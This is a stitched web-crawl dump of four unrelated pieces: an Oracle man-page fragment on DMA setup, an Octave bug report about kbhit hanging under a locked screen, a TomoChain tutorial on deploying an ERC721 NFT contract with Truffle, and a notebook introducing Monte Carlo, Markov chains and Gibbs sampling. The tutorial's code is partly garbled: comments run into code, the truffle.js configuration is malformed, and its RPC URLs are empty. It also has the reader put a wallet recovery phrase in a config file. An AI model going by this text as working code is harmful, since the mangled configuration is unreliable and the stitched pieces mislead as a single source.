A pointer to a DMA limits structure for this device (see ddi_dma_lim_sparc(9S) or ddi_dma_lim_x86(9S)). If this pointer is NULL, a default set of DMA limits is assumed.
Pointer to a DMA handle. See ddi_dma_setup(9F) for a discussion of handle.
The ddi_dma_addr_setup() function is an interface to ddi_dma_setup(9F). It uses its arguments to construct an appropriate ddi_dma_req structure and calls ddi_dma_setup(9F) with it.
See ddi_dma_setup(9F) for the possible return values for this function.
The ddi_dma_addr_setup() can be called from user, interrupt, or kernel context, except when waitfp is set to DDI_DMA_SLEEP, in which case it cannot be called from interrupt context.
See attributes(5) for a description of the following attributes:
attributes(5), ddi_dma_buf_setup(9F), ddi_dma_free(9F), ddi_dma_htoc | https://docs.oracle.com/cd/E36784_01/html/E36886/ddi-dma-addr-setup-9f.html | CC-MAIN-2019-30 | en | refinedweb |
URL: <> Summary: KBHIT(1) should return immediately. It takes 8+ hours instead: Project: GNU Octave Submitted by: deego Submitted on: Sat 08 Dec 2018 03:27:20 AM UTC Category: Octave Function Severity: 3 - Normal Priority: 5 - Normal Item Group: Unexpected Error Status: None Assigned to: None Originator Name: deego Originator Email: Open/Closed: Open Discussion Lock: Any Release: 4.2.2 Operating System: GNU/Linux _______________________________________________________ Details: Your giant computation takes 30 days, so (1) You want to plot the results intermittently, so you are stuck with using the qt- toolkit.[1] (2) If user presses "T", your running program wishes to detect the keypress, and do certain actions [save work, terminate gracefully, etc.] (3) Unfortunately, you occasionally do have to go home to shower during these 30 days, and for security, you have to allow the screensaver to lock the screen when you go home. Your boss is strange and thinks that those are some pretty reasonable minimal set of requirements your program should have. Here's a SSCCE that shows how kbhit(1) hangs forever when you try these things: (a) Debian Stable, self-compiled octave 4.22, xfce4. (b) start octave --no-gui [which uses qt by default] and run the SSCCE below: yyybug008. You start hearing a beep and see a plot after every intermediate result. Better yet, start several octave's. (c) That's it. Congfigure xfce4 to lock monitor within 1 minute. Disable *all* hibernating/sleeping. Indeed, your other scripts - including octave ones - keep working during the monitor-sleep, confirming that your system was alive and kicking all this time! (d) Wait a minute and your screen locks. Almost immediately, you stop hearing any beeps. Wait upto 1-5 minutes if you still hear them. (e) Unlock the screen after the beeps stop or after you take that shower. Each octave has errored out because it detected that kbhit(1) was hung instead of returning immediately. I have seen hangs of 8 hours - or however long I leave the screen locked. Thus, all work stops when the screen locks. :( [1] If you use any other toolkit, then the plotted figure either doesn't show till the end of 30 days, or if it does, it gets lost very easily: You alt-tab or switch workspace, and you now have a blank figure. function yyybug008(); while true; for mmm=1:100; ig = __kbhitcheck; endfor plot(rand(1,2), rand(1,2)); hold off; pause(2+rand()); system("beep"); endwhile endfunction function out = __kbhitcheck; ticcer=tic(); out=kbhit(1); timetaken = toc(ticcer); if timetaken>1; error(sprintf("kbhit(1) should have taken negligible time, but took %f seconds.", timetaken)); endif endfunction _______________________________________________________ Reply to this item at: <> _______________________________________________ Message sent via Savannah | https://lists.gnu.org/archive/html/octave-bug-tracker/2018-12/msg00117.html | CC-MAIN-2019-30 | en | refinedweb |
How to deploy NFT tokens on TomoChain
Create your unique ERC721 tokens (ie: CryptoKitties) on TomoChain!
This article will explain:
- What is a Non-Fungible Token (NFT)
- Use-cases of NFT
- How-to step-by-step deploy a NFT token on TomoChain
What is a Non-Fungible Token (NFT)?
Fungible tokens are all equal and interchangeable. For instance, dollars or Bitcoins or 1 kilogram of pure gold or ERC20 tokens. All TOMO coins are equivalent too, they are the same and have the same value. They are interchangeable 1:1. This is a fungible token.
Non-fungible tokens (NFTs) are all distinct and special. Every token is rare, with unique atributes and different value. For instance: CryptoKitty tokens, collectible cards, airplane tickets or real art paintings. Every item has its own characteristics and specifics and is clearly differentiable to another one. They are not interchangeable 1:1. They are distinguishable.
Think of Non-Fungible Tokens (NFT) as a rare collectible on the TomoChain network. Every token has unique characteristics, its own metadata and special attributes
Non-Fungible Tokens (NFT) are used to create verifiable digital scarcity. NFTs are unique and distinctive tokens that you can mainly find on EVM blockchains.
The ERC-721 is the standard interface for Non-Fungible Tokens (but there are also other NFTs, like ERC1155). ERC721 is a set of rules to make your NFT easy for other people / apps / contracts to interface with.
ERC721 is a free, open standard that describes how to build non-fungible or unique tokens on EVM compatible blockchains. While most tokens are fungible (not distinguishable), ERC721 tokens are all unique, with individual identities and properties. Think of them like rare, one-of-a-kind collectables — each unit is a unique item with its own serial number.
ERC20: identical tokens. ERC721: unique tokens
Some high demand non-fungible tokens are applications like CryptoKitties, Decentraland, CryptoPunks, and many others.
CryptoKitties
At the end of 2017, NFTs made a remarkable entrance in the blockchain world with the sucess of CryptoKitties. Each one is a unique collectible item, with its own serial number, which can be compared to its DNA card. This unleashed an unprecedented interest for NFTs, that went so far as to clog the Ethereum network. The CryptoKitties market alone generated $12 million dollars in two weeks after its launch, and over $25 million in total. Some rare cryptokitties were even sold for 600 ETH ($170,000).
The strength of NFTs resides in the fact that each token is unique and cannot be mistaken for another one– unlike bitcoins, for example, which are interchangeable with one another.
Crypto Item Standard (ERC-1155)
One step further in the non-fungible token space is the ERC-1155 Standard proposed by the Enjin team, also known as the “Crypto Item Standard”. This is an improved version of ERC-721 which will actually be suitable for platforms where there are tens of thousands of digital items and goods.
Online games can have up to 100,000 different digital items. The current problem with ERC-721 is that if we would like to tokenize all those 100,000 items, then we would need to deploy 100,000 separate smart contracts.
ERC-1155 standard combines ERC-20 and ERC-721 tokens in its smart contract. Each token is saved in the contract with a minimal set of data that distinguishes it from others. This allows for the creation of bigger collections which contain multiple different items.
Use-cases of Non-Fungible Tokens (NFT)
Most of the time when people think about ERC-721 or NFT, they refer to the most notably successful CryptoKitties. But there are many other usability applications for NFT contracts:
- Software titles or software licences to guarantee anti-piracy, privacy and transferability — like Collabs.io
- Betting in real time on the outcome of a video game being live-streamed
- Gaming in general is an important field of experimentation and development for the uses of NFT in the future. TomoChain is having mini contests for games on blockchain, and is welcoming all developers to build blockchain games
- Concert tickets and sports match tickets can be tokenized and name-bound, preventing fraud and at the same time offering fans an option to have a single place where to collect all their past event experiences
- Digital Art (or physical art!) has already entered the game and showed an important usage of ERC721. Digital art auctions were the first application and still are the first thought of non-fungible token standards. The auctions organized by Christie’s revealed the appeal of the public for crypto-collectibles. Several digital art assets were sold during this event, the high point being the sale of the ‘Celestial Cyber Dimension’, an ERC721 CryptoKitty piece of art, for $140,000
- Real Estate assets, to carry out transfers of houses, land and other ‘tokenized’ properties through smart contracts
- Financial instruments like loans, burdens and other responsibilities, or a futures contract to buy 1,000 barrels of oil for $60k on May 1
- KYC compliance check to verify users. Receiving a specific NFT token in your wallet similar to the blue checkmark ☑️ on Twitter — like Wyre
- and more…
Crypto-Collectibles are more than a passing craze. It is easy to see the reason why, especially when you look at the potential of the crypto-collectible technology, including: securing digital ownership, protecting intellectual property, tracking digital assets and overall creating real world value.
How to deploy a NFT token on TomoChain
This article will create a basic ERC721 token using the OpenZeppelin implementation of the ERC721 standard. Look at the links in order to familiarize yourself with the requirements as they can sometimes be hidden in the excellent OpenZeppelin ERC721 implementations.
The assets that your ERC721 tokens (NFT) represent will influence some of the design choices for how your contract works, most notably how new tokens are created.
- You can have an initial supply of tokens defined during token creation
- You can have a function, which is only callable by the contract creator (or others — if you allow this) that will issue new tokens when called
For example, in CryptoKitties, players are able to “breed” their Kitties, which creates new Kitties (tokens). However, if your ERC721 token represents something more tangible, like concert tickets, you may not want token holders to be able to create more tokens. In some cases, you may even want token holders to be able to “burn” their tokens, effectively destroying them.
Let’s Start the NFT Tutorial
We will now implement a NFT collectible token, like CryptoKitties but with simpler logic.
You’ll learn how to create non fungible tokens, how to write tests for your smart contracts and how to interact with them once deployed.
We’ll build non-fungible collectibles: gradient tokens. Every token will be represented as a unique CSS gradient and will look somewhat like this:
1. Creating a new project
Create a new directory and move inside it. Then start a new
Truffle project:
mkdir nft-tutorial
cd nft-tutorial
truffle init
We will use OpenZeppelin ERC721 implementation, which is quick and easy and broadly used. Install
OpenZeppelin in the current folder.
npm install openzeppelin-solidity
2. Preparing your TOMO wallet
Create a TOMO wallet. Then grab a few tokens:
TomoChain (testnet): Get free tokens from faucet (grab ~60 TOMO)
TomoChain (mainnet): You will need real TOMO from exchanges
Go to Settings menu, select Backup wallet and then Continue. Here you can see your wallet’s private key and the 12-word recovery phrase.
Write down your 12-word recovery phrase.
3. Writing the Smart Contract
3.1 GradientToken.sol
We’ll be extending now the OpenZeppelin ERC721 token contracts to create our Gradient Token.
- Go to
contracts/folder and create a new file called
GradientToken.sol
- Copy the following code
pragma solidity ^0.5.4;import 'openzeppelin-solidity/contracts/token/ERC721/ERC721Full.sol';
import 'openzeppelin-solidity/contracts/ownership/Ownable.sol';// NFT Gradient token
// Stores two values for every token: outer color and inner colorcontract GradientToken is ERC721Full, Ownable {
using Counters for Counters.Counter;
Counters.Counter private tokenId;
struct Gradient {
string outer;
string inner;
}
Gradient[] public gradients; constructor(
string memory name,
string memory symbol
)
ERC721Full(name, symbol)
public
{}
// Returns the outer and inner colors of a token
function getGradient( uint256 gradientTokenId ) public view returns(string memory outer, string memory inner){
Gradient memory _gradient = gradients[gradientTokenId]; outer = _gradient.outer;
inner = _gradient.inner;
} // Create a new Gradient token with params: outer and inner
function mint(string memory _outer, string memory _inner) public payable onlyOwner {
uint256 gradientTokenId = tokenId.current();
Gradient memory _gradient = Gradient({ outer: _outer, inner: _inner });
gradients.push(_gradient);
_mint(msg.sender, gradientTokenId);
tokenId.increment();
}
}
We inherited from two contracts: ERC721Full to make it represent a non-fungible token, and from the Ownable contract.
Every token will have a unique
tokenId, like a serial number. We also added two attributes:
inner and
outer to save CSS colors.
Ownable allows managing authorization. It assigns ownership to deployer (when the contract is deployed) and adds modifier onlyOwner that allows you to restrict certain methods only to contract owner. Also, you can transfer ownership. You can approve a third party to spend tokens, burn tokens, etc.
Our solidity code is simple and I would recommend a deeper dive into the ERC-721 standard and the OpenZeppelin implementation.
You can see the functions to use in OpenZeppelin ERC721 here and here.
You can find another ERC721 smart contract example by OpenZeppelin here.
4. Config Migrations
4.1 Create the migration scripts
In the
migrations/ directory, create a new file called
2_deploy_contracts.js and copy the following:
const GradientToken = artifacts.require("GradientToken");module.exports = function(deployer) {
const _name = "Gradient Token";
const _symbol = "GRAD";
return deployer
.then(() => deployer.deploy(GradientToken, _name, _symbol));
};
This code will deploy or migrate our contract to TomoChain, with the name
Gradient Token and the symbol
GRAD.
4.2 Configure truffle.js
Now we set up the migrations: the blockchain where we want to deploy our smart contract, specify the wallet address to deploy, gas, price, etc.
1. Install Truffle’s
HDWalletProvider, a separate npm package to find and sign transactions for addresses derived from a 12-word
mnemonic.
npm install truffle-hdwallet-provider
2. Open
truffle.js file (
truffle-config.js on Windows). You can edit here the migration settings: networks, chain IDs, gas... You have multiple networks to migrate your ICO, you can deploy: locally,
ganache, public
Ropsten (ETH) testnet,
TomoChain (testnet),
TomoChain (Mainnet), etc…
Both Testnet and Mainnet network configurations are described in the official TomoChain documentation — Networks. We need the
RPC endpoint, the
Chain id and the
HD derivation path.
Replace the
truffle.js file with this new content:
const HDWalletProvider = require('truffle-hdwallet-provider');
const infuraKey = "a93ffc...<PUT YOUR INFURA-KEY HERE>";// const fs = require('fs');
// const mnemonic = fs.readFileSync(".secret").toString().trim();
const mnemonic = '<PUT YOUR WALLET 12-WORD RECOVERY PHRASE HERE>';module.exports = { networks: {
// Useful for testing. The `development` name is special - truffle uses it by default
development: {
host: "127.0.0.1", // Localhost (default: none)
port: 8545, // Standard Ethereum port (default: none)
network_id: "*", // Any network (default: none)
}, // Useful for deploying to a public network.
// NB: It's important to wrap the provider as a function.
ropsten: {
//provider: () => new HDWalletProvider(mnemonic, `{infuraKey}`),
provider: () => new HDWalletProvider(
mnemonic,
`{infuraKey}`,
0,
1,
true,
"m/44'/889'/0'/0/", // Connect with HDPath same as TOMO
), deploying to TomoChain testnet
tomotestnet: {
provider: () => new HDWalletProvider(
mnemonic,
"",
0,
1,
true,
"m/44'/889'/0'/0/",
),
network_id: "89",
gas: 3000000,
gasPrice: 10000000000000, // TomoChain requires min 10 TOMO to deploy, to fight spamming attacks
}, // Useful for deploying to TomoChain mainnet
tomomainnet: {
provider: () => new HDWalletProvider(
mnemonic,
"",
0,
1,
true,
"m/44'/889'/0'/0/",
),
network_id: "88",
gas: 3000000,
gasPrice: 10000000000000, // TomoChain requires min 10 TOMO to deploy, to fight spamming attacks
}, //
compilers: {
solc: {
version: "0.5.4", //"
// }
}
}
}
3. Remember to update the
truffle.js file using your own wallet recovery phrase. Copy the 12 words previously obtained from your wallet and paste it as the value of the
mnemonic variable.
const mnemonic = '<PUT YOUR WALLET 12-WORD RECOVERY PHRASE HERE>';
⚠️ Warning: In production, it is highly recommend storing the
mnemonicin another secret file (loaded from environment variables or a secure secret management system)...
4.3 Ganache
You can use
Ganache blockchain to test your smart contracts locally, before migrating to a public blockchain like
Ethereum (Ropsten) or
Tomochain.
On a separate console window, install
Ganache and run it:
npm install -g ganache-cli
ganache-cli -p 8545
Ganache will start running, listening on port
8545. Automatically you will have 10 available wallets with their private keys and
100 ETH each. You can use them to test your smart contracts.
5. Adding Tests
We will add now tests to check our smart contracts.
When you deploy contracts your first contract will usually be the deployer. This test will check that.
Create
GradientTokenTest.js in
/test directory and write the following test:
const GradientToken = artifacts.require("GradientToken");contract("Gradient token", accounts => {
it("Should make first account an owner", async () => {
let instance = await GradientToken.deployed();
let owner = await instance.owner();
assert.equal(owner, accounts[0]);
});
});
Here we run the
contract block, that deploys our contract. We wait for the contract to be deployed and request
owner() which returns owner’s address. Then we assert that the owner address is the same as
account[0].
Note: Make sure that
Ganacheis running (on a different console).
Run the test:
truffle test
The test should pass. This means that the smart contract works correctly and it did successfully what it was expected to do.
Adding more tests
Every NFT token will have a unique ID. The first minted token has
ID: 0, the second one has
ID: 1, and on and on…
Now we’ll test the
mint function. Add the following test:
describe("mint", () => {
it("creates token with specified outer and inner colors", async () => {
let instance = await GradientToken.deployed();
let owner = await instance.owner(); let token0 = await instance.mint("#ff00dd", "#ddddff");
let token1 = await instance.mint("#111111", "#ffff22");
let token2 = await instance.mint("#00ff00", "#ffff00"); let gradients1 = await instance.getGradient( 1 );
assert.equal(gradients1.outer, "#111111");
assert.equal(gradients1.inner, "#ffff22");
});
});
This test is simple. First we check that we can mint new tokens. We mint 3 tokens. Then we expect that the unique attributes
outer and
inner of token with tokenId =
1 are saved correctly and we assert it by using the
getGradient function that we created before.
The test passed.
6. Deploying
6.1 Start the migration
You should have your smart contract already compiled. Otherwise, now it’s a good time to do it with
truffle compile.
Note: Check that you have enough
TOMOtokens in your wallet!! I recommend at least
60 TOMOto deploy this smart contract
Back in our terminal, migrate the contract to TomoChain testnet network:
truffle migrate --network tomotestnet
To deploy to TomoChain mainnet is very similar:
truffle migrate --network tomomainnet
The migrations start…
Starting migrations...
======================
> Network name: 'tomotestnet'
> Network id: 89
> Block gas limit: 840000001_initial_migration.js
======================Deploying 'Migrations'
----------------------
> transaction hash: 0x67c0f12247d0bb0add43e81e8ad534df9cd7d3473ef76f5b60cee3e3d34bae1a
> Blocks: 2 Seconds: 5
> contract address: 0x6056dC38715C7d2703a8aA94ee68A964eaE86fdc
> account: 0x169397F515Af9E93539e0F483f8A6FC115de660C
> balance: 90.05683
> gas used: 273162
> gas price: 10000 gwei
> value sent: 0 ETH
> total cost: 2.73162 ETH> Saving artifacts
-------------------------------------
> Total cost: 2.73162 ETH2_deploy_contracts.js
=====================Deploying 'GradientToken'
-------------------------
> transaction hash: 0xca09a87ad8f834644dcb85f8ea89beff74b818eff11d355e0774e6b60c51718c
> Blocks: 2 Seconds: 5
> contract address: 0x8B830F38b798B7b39808A059179f2c228209514C
> account: 0x169397F515Af9E93539e0F483f8A6FC115de660C
> balance: 60.64511
> gas used: 2941172
> gas price: 10000 gwei
> value sent: 0 ETH
> total cost: 29.41172 ETH> Saving artifacts
-------------------------------------
> Total cost: 29.41172 ETHSummary
=======
> Total deployments: 2
> Final cost: 32.14334 ETH
Congratulations! You have already deployed your non-fungible token (NFT) to TomoChain! The deployment fees were
32.14 TOMO.
Read the output text on the screen. The NFT token contract address is (yours will be different):
0x8B830F38b798B7b39808A059179f2c228209514C
⚠️ Note: TomoChain’s smart contract creation fee: gas price 10000 Gwei, gas limit >= 1000000
*** Troubleshooting ***
- Error:
smart contract creation cost is under allowance. Why?Increasing transaction fees for smart contract creation is one of the ways TomoChain offers to defend against spamming attacks. Solution: edit
truffle.jsand add more gas/gasPrice to deploy.
- Error:
insufficient funds for gas * price + value. Why? You don’t have enough tokens in your wallet for gas fees. Solution: you need more funds in your wallet to deploy, go to faucet and get more tokens.
7. Interacting with the smart contract
7.1 Minting new Tokens
Now to create a new Gradient Token you can call:
GradientToken(gradientTokenAddress).mint("#001111", "#002222")
You can call this function via MyEtherWallet/Metamask or Web3... In a DApp or game this would probably be called from a button click in a UI.
Let’s use MyEtherWallet (MEW) to interact with the contract. We use MetaMask to connect to the GradientToken owner wallet in TomoChain (testnet), then we will call function
mint() to mint the first token.
In MyEtherWallet, under menu
Contract >
Interact with Contract two things are required:
- Contract Address: you got this address when you deployed
- ABI: file
build/contracts/GradientToken.json, search
"abi": […
]and copy everything inside brackets, including brackets. Then paste on MEW
On the right you will see a dropdown list with the functions. Select
mint. MEW will show two fields:
outer and
inner. Input two colors, like
#ff0000 or
#0000ff and click the button Write. Confirm with MetaMask.
Here is our contract address, and the new
mint transaction:
You can use MEW to Write and to Read functions, like
getGradient! This way you can check if values are correct, totalSupply, transfer tokens...
Note: In
Ethereum (Ropsten), the Etherscan page with our migrated contract will change after the first token is minted. A new link will be displayed now to track the ERC721 token
GRAD.
What’s next?
A few suggestions to continue from here:
- You could add a lot of different attributes to your unique NFT tokens
- You can connect to a JS front end and show your tokens
- You can have some buttons to interact with the tokens (buy, sell, change, transfer, change attributes/colors, etc…)
- You can iterate on this basic code and create a new CryptoKitties game :)
Congratulations! You have learnt about non-fungible tokens, use-cases of NFTs and how to deploy NFT tokens on TomoChain.
Now we are looking forward to see your awesome ideas implemented! | https://medium.com/tomochain/how-to-deploy-nft-tokens-on-tomochain-fe476a68594d?source=collection_home---4------2----------------------- | CC-MAIN-2019-30 | en | refinedweb |
Switching Angular Services at Runtime
A while ago I've already written a blogpost on how to inject a different Angular service implementation based on a runtime value. With that approach, the selected service was initialized at startup and remained the same for the entire application lifetime. In response to that blogpost, I received a question how one could switch between the implementations while the application is running. This blogpost is my detailed answer to that question.
At least to my knowledge, there's no built-in support for such functionality in Angular's dependency injection implementation. This means that from Angular's point of view the same service will be in use the whole time. The switching logic will have to be implemented inside that service.
Encapsulating Both Implementations in a Single Service
The simplest approach would be to include both implementations inside that single service. For example, the following custom
ErrorHandler service can switch between local and remote error reporting at runtime:
import { Injectable, ErrorHandler } from '@angular/core'; export type ErrorHandlerMode = 'local' | 'remote'; @Injectable() export class CustomErrorHandlerService implements ErrorHandler { mode: ErrorHandlerMode = 'local'; constructor() { } handleError(error: any): void { switch (this.mode) { case 'local': this.handleErrorLocal(error); break; case 'remote': this.handleErrorRemote(error); break; } } private handleErrorLocal(error: any) { console.error(error); } private handleErrorRemote(error: any) { console.log('Send error to remote service.'); } }
The
handleError method delegates the call to the appropriate implementation based on the current value of the
mode property. The value of the property can change at runtime. It can even be bound to an
input element:
<div> <input name="mode" type="radio" id="local" value="local" [(ngModel)]="errorHandler.mode"> <label for="local">Local error reporting</label> </div> <div> <input name="mode" type="radio" id="remote" value="remote" [(ngModel)]="errorHandler.mode"> <label for="remote">Remote error reporting</label> </div>
There are two more prerequisites for this to work:
The custom
ErrorHandlermust be injected into the component which will implement the mode switching:
constructor(public errorHandler: ErrorHandler) { }
The
CustomErrorHandlerServicemust be declared as the provider for the
ErrorHandlerservice in
AppModule:
providers: [ { provide: ErrorHandler, useClass: CustomErrorHandlerService } ],
For simple services, this approach can be good enough. But as the number of methods in the service increases, repeating the switching logic in each one and having to keep everything in a single class will make maintenance more difficult.
Implementing the Strategy Pattern
The Strategy software design pattern is a standard approach for dynamically selecting an algorithm (or an implementation in our case) at runtime. It consists of:
- The
Contextclass which delegates the calls to the correct implementation. In our case, this is the
CustomErrorHandlerService.
- The
Strategyinterface which is the common interface of all the implementations. In our case, this is the
ErrorHandler.
- Multiple classes which implement the
Strategyinterface in a different way. In our case, this will be the
LocalErrorHandlerStrategyand the
RemoteErrorHandlerStrategy.
The following UML diagram describes the relations between them:
Let's take a look at the code. The
handleError method now simply calls the corresponding method in the currently selected strategy. I implemented the switching of strategies in the
mode property setter:
import { LocalErrorHandlerStrategy } from './local-error-handler-strategy.service'; import { Injectable, ErrorHandler } from '@angular/core'; import { RemoteErrorHandlerStrategy } from './remote-error-handler-strategy.service'; export type ErrorHandlerMode = 'local' | 'remote'; @Injectable() export class CustomErrorHandlerService implements ErrorHandler { private modeValue: ErrorHandlerMode; private currentStrategy: ErrorHandler; get mode(): ErrorHandlerMode { return this.modeValue; } set mode(value: ErrorHandlerMode) { this.modeValue = value; switch (value) { case 'local': this.currentStrategy = this.localStrategy; break; case 'remote': this.currentStrategy = this.remoteStrategy; } } constructor( private localStrategy: LocalErrorHandlerStrategy, private remoteStrategy: RemoteErrorHandlerStrategy) { this.mode = 'local'; } handleError(error: any): void { this.currentStrategy.handleError(error); } }
The two strategies are also implemented as Angular services and provided by dependency injection. If I didn't have to do any switching at runtime they could be used as standard services on their own:
import { Injectable, ErrorHandler } from '@angular/core'; @Injectable({ providedIn: 'root' }) export class LocalErrorHandlerStrategy implements ErrorHandler { constructor() { } handleError(error: any): void { console.error(error); } }
import { Injectable, ErrorHandler } from '@angular/core'; @Injectable({ providedIn: 'root' }) export class RemoteErrorHandlerStrategy implements ErrorHandler { constructor() { } handleError(error: any): void { console.log('Send error to remote service.'); } }
The rest of the code remains the same as in the first approach. The Strategy pattern does not affect the public interface of the
CustomErrorHandlerService. It only changes how the switching is handled internally allowing proper separation between the different implementations. | http://www.damirscorner.com/blog/posts/20190510-SwitchingAngularServicesAtRuntime.html | CC-MAIN-2019-30 | en | refinedweb |
Computational Methods in Bayesian Analysis in Python
Monte Carlo simulations, Markov chains, Gibbs sampling illustrated in Plotly
About the author: This notebook was forked from this project. The original author is Chris Fonnesbeck, Assistant Professor of Biostatistics. You can follow Chris on Twitter @fonnesbeck.
Introduction¶
For most problems of interest, Bayesian analysis requires integration over multiple parameters, making the calculation of a posterior intractable whether via analytic methods or standard methods of numerical integration.
However, it is often possible to approximate these integrals by drawing samples from posterior distributions. For example, consider the expected value (mean) of a vector-valued random variable $\mathbf{x}$:$$ E[\mathbf{x}] = \int \mathbf{x} f(\mathbf{x}) \mathrm{d}\mathbf{x}\,, \quad \mathbf{x} = \{x_1, \ldots, x_k\} $$
where $k$ (dimension of vector $\mathbf{x}$) is perhaps very large.
If we can produce a reasonable number of random vectors $\{{\bf x_i}\}$, we can use these values to approximate the unknown integral. This process is known as Monte Carlo integration. In general, Monte Carlo integration allows integrals against probability density functions$$ I = \int h(\mathbf{x}) f(\mathbf{x}) \mathrm{d}\mathbf{x} $$
to be estimated by finite sums$$ \hat{I} = \frac{1}{n}\sum_{i=1}^n h(\mathbf{x}_i), $$
where $\mathbf{x}_i$ is a sample from $f$. This estimate is valid and useful because:
$\hat{I} \rightarrow I$ with probability $1$ by the strong law of large numbers;
simulation error can be measured and controlled.
Example (Negative Binomial Distribution)¶
We can use this kind of simulation to estimate the expected value of a random variable that is negative binomial-distributed. The negative binomial distribution applies to discrete positive random variables. It can be used to model the number of Bernoulli trials that one can expect to conduct until $r$ failures occur.
The probability mass function reads$$ f(k \mid p, r) = {k + r - 1 \choose k} (1 - p)^k p^r\,, $$
where $k \in \{0, 1, 2, \ldots \}$ is the value taken by our non-negative discrete random variable and $p$ is the probability of success ($0 < p < 1$).
Most frequently, this distribution is used to model overdispersed counts, that is, counts that have variance larger than the mean (i.e., what would be predicted under a Poisson distribution).
In fact, the negative binomial can be expressed as a continuous mixture of Poisson distributions, where a gamma distributions act as mixing weights:$$ f(k \mid p, r) = \int_0^{\infty} \text{Poisson}(k \mid \lambda) \, \text{Gamma}_{(r, (1 - p)/p)}(\lambda) \, \mathrm{d}\lambda, $$
where the parameters of the gamma distribution are denoted as (shape parameter, inverse scale parameter).
Let's resort to simulation to estimate the mean of a negative binomial distribution with $p = 0.7$ and $r = 3$:
import numpy as np r = 3 p = 0.7
# Simulate Gamma means (r: shape parameter; p / (1 - p): scale parameter). lam = np.random.gamma(r, p / (1 - p), size=100)
# Simulate sample Poisson conditional on lambda. sim_vals = np.random.poisson(lam)
sim_vals.mean()
6.3399999999999999
The actual expected value of the negative binomial distribution is $r p / (1 - p)$, which in this case is 7. That's pretty close, though we can do better if we draw more samples:
lam = np.random.gamma(r, p / (1 - p), size=100000) sim_vals = np.random.poisson(lam) sim_vals.mean()
7.0135199999999998
This approach of drawing repeated random samples in order to obtain a desired numerical result is generally known as Monte Carlo simulation.
Clearly, this is a convenient, simplistic example that did not require simuation to obtain an answer. For most problems, it is simply not possible to draw independent random samples from the posterior distribution because they will generally be (1) multivariate and (2) not of a known functional form for which there is a pre-existing random number generator.
However, we are not going to give up on simulation. Though we cannot generally draw independent samples for our model, we can usually generate dependent samples, and it turns out that if we do this in a particular way, we can obtain samples from almost any posterior distribution.
Markov Chains¶
A Markov chain is a special type of stochastic process. The standard definition of a stochastic process is an ordered collection of random variables:$$ \{X_t:t \in T\} $$
where $t$ is frequently (but not necessarily) a time index. If we think of $X_t$ as a state $X$ at time $t$, and invoke the following dependence condition on each state:\begin{align*} &Pr(X_{t+1}=x_{t+1} | X_t=x_t, X_{t-1}=x_{t-1},\ldots,X_0=x_0) \\ &= Pr(X_{t+1}=x_{t+1} | X_t=x_t) \end{align*}
then the stochastic process is known as a Markov chain. This conditioning specifies that the future depends on the current state, but not past states. Thus, the Markov chain wanders about the state space, remembering only where it has just been in the last time step.
The collection of transition probabilities is sometimes called a transition matrix when dealing with discrete states, or more generally, a transition kernel.
It is useful to think of the Markovian property as mild non-independence.
If we use Monte Carlo simulation to generate a Markov chain, this is called Markov chain Monte Carlo, or MCMC. If the resulting Markov chain obeys some important properties, then it allows us to indirectly generate independent samples from a particular posterior distribution.
Why MCMC Works: Reversible Markov Chains¶
Markov chain Monte Carlo simulates a Markov chain for which some function of interest (e.g., the joint distribution of the parameters of some model) is the unique, invariant limiting distribution. An invariant distribution with respect to some Markov chain with transition kernel $Pr(y \mid x)$ implies that:$$\int_x Pr(y \mid x) \pi(x) dx = \pi(y).$$
Invariance is guaranteed for any reversible Markov chain. Consider a Markov chain in reverse sequence: $\{\theta^{(n)},\theta^{(n-1)},...,\theta^{(0)}\}$. This sequence is still Markovian, because:$$Pr(\theta^{(k)}=y \mid \theta^{(k+1)}=x,\theta^{(k+2)}=x_1,\ldots ) = Pr(\theta^{(k)}=y \mid \theta^{(k+1)}=x)$$
Forward and reverse transition probabilities may be related through Bayes theorem:$$\frac{Pr(\theta^{(k+1)}=x \mid \theta^{(k)}=y) \pi^{(k)}(y)}{\pi^{(k+1)}(x)}$$
Though not homogeneous in general, $\pi$ becomes homogeneous if:
-
$n \rightarrow \infty$
-
$\pi^{(i)}=\pi$ for some $i < k$
If this chain is homogeneous it is called reversible, because it satisfies the detailed balance equation:$$\pi(x)Pr(y \mid x) = \pi(y) Pr(x \mid y)$$
Reversibility is important because it has the effect of balancing movement through the entire state space. When a Markov chain is reversible, $\pi$ is the unique, invariant, stationary distribution of that chain. Hence, if $\pi$ is of interest, we need only find the reversible Markov chain for which $\pi$ is the limiting distribution. This is what MCMC does!
Gibbs Sampling¶
The Gibbs sampler is the simplest and most prevalent MCMC algorithm. If a posterior has $k$ parameters to be estimated, we may condition each parameter on current values of the other $k-1$ parameters, and sample from the resultant distributional form (usually easier), and repeat this operation on the other parameters in turn. This procedure generates samples from the posterior distribution. Note that we have now combined Markov chains (conditional independence) and Monte Carlo techniques (estimation by simulation) to yield Markov chain Monte Carlo.
Here is a stereotypical Gibbs sampling algorithm:
Choose starting values for states (parameters): ${\bf \theta} = [\theta_1^{(0)},\theta_2^{(0)},\ldots,\theta_k^{(0)}]$.
Initialize counter $j=1$.
Draw the following values from each of the $k$ conditional distributions:
$$\begin{aligned} \theta_1^{(j)} &\sim& \pi(\theta_1 | \theta_2^{(j-1)},\theta_3^{(j-1)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \theta_2^{(j)} &\sim& \pi(\theta_2 | \theta_1^{(j)},\theta_3^{(j-1)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \theta_3^{(j)} &\sim& \pi(\theta_3 | \theta_1^{(j)},\theta_2^{(j)},\ldots,\theta_{k-1}^{(j-1)},\theta_k^{(j-1)}) \\ \vdots \\ \theta_{k-1}^{(j)} &\sim& \pi(\theta_{k-1} | \theta_1^{(j)},\theta_2^{(j)},\ldots,\theta_{k-2}^{(j)},\theta_k^{(j-1)}) \\ \theta_k^{(j)} &\sim& \pi(\theta_k | \theta_1^{(j)},\theta_2^{(j)},\theta_4^{(j)},\ldots,\theta_{k-2}^{(j)},\theta_{k-1}^{(j)})\end{aligned}$$
Increment $j$ and repeat until convergence occurs.
As we can see from the algorithm, each distribution is conditioned on the last iteration of its chain values, constituting a Markov chain as advertised. The Gibbs sampler has all of the important properties outlined in the previous section: it is aperiodic, homogeneous and ergodic. Once the sampler converges, all subsequent samples are from the target distribution. This convergence occurs at a geometric rate.
Example: Inferring patterns in UK coal mining disasters¶
Let's try to model a more interesting example, a time series of recorded coal mining disasters in the UK from 1851 to 1962.
